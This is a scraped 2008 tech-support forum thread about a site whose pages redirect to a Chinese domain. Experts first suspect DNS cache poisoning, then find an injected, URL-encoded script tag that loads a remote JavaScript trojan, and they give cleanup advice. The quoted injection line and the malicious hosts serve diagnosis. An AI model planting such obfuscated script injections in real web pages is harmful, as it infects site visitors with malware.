Ensure there aren't any bad entries for the intranet DNS record on your DNS server. Run from the command prompt: IPconfig /flushdns on your DNS servers and clients. Good luck.
Main Topics
Browse All TopicsHi All,
It seems that our web pages are being redirected toe http://www.365http.cn/tt/l
This Question has been solved and asker verified All Experts Exchange premium technology solutions are available to subscription members.
Experts Exchange has been collecting answers to technology questions since 1996…3 million and counting! If you have a question, chances are we already have your answer.
If you can't find the exact answer you're looking for, ask our exclusive community of 50,000 experts. You’ll get a personalized answer from a trusted professional.
Thousands of free tech tips, tricks, how-to’s and tutorials are available in our peer reviewed articles section. See for yourself how smart our experts are, no login required.
Access the answers to your technology questions today.
30-day free trial. Register in 60 seconds.
Members of the expert community talk about why the experience at Experts Exchange is different than what you will find anywhere else.

Try it out and discover for yourself.
30-day free trial. Register in 60 seconds.
Join the community of experts here and help other tech pros by answering question in your area of expertise. You can earn FREE access to all Experts Exchange's premium features and resources.
Make sure you flush the caches on both your internal DNS server, and your firewall's DNS server. Either or both could be poisoned.
If you have the opportunity, you can dump the DNS server's caches before flushing them to check for poisoning. Also, current releases of DNS servers should be resistant to DNS poisoning, so make sure your DNS server is an up-to-date release. If it got poisoned once, it can happen again unless you change something to prevent it.
You should see something like
Server: 192.168.1.1
Address: 192.168.1.1#53
Name: www.domain.com
Address: 192.168.1.2
If you resolve an address on the Internet against your DNS server, you should see something like:
nslookup www.google.com
Server: 192.168.1.1
Address: 192.168.1.1#53
Non-authoritative answer:
www.google.com canonical name = www.l.google.com.
Name: www.l.google.com
Address: 72.14.205.99
Name: www.l.google.com
Address: 72.14.205.104
Name: www.l.google.com
Address: 72.14.205.147
Name: www.l.google.com
Address: 72.14.205.103
The difference is that you're not the authoritative source for www.google.com
Is this not similar to what you see?
When doing the nslookup , I do see the same info as you have displayed with the exception of the port #.
The first line will refer to the domain controller /dns controller /wins server, while the second line refer to the actual application server.
Also please find attached the source code for the webpage.
Thanks
Your webpage was hacked.
Please remove the top line.
<script language=javascript src=http://%77%2E%63%38%38
That points to w.c88j.cn/lg.js
This is a virus wit a payload that downloads a bunch of other code. I'f you've viewed this page from a browser on your web server, it's infect as well as the clients that view the page.
Shut down the web server before anything else gets infected. This isn't spyware. It's a virus/trojan. As mrwalker15 mentioned, run an anti-virus on the server and the clients. It's recognized by all the major ones. Check out:
http://virscan.org/report/
to make sure your AV is up-to-date for this virus.
Business Accounts
Answer for Membership
by: mrwalker15Posted on 2008-10-27 at 09:59:46ID: 22814423
Your DNS cache has been poisoned. Clear the DNS cache from all your DNS servers.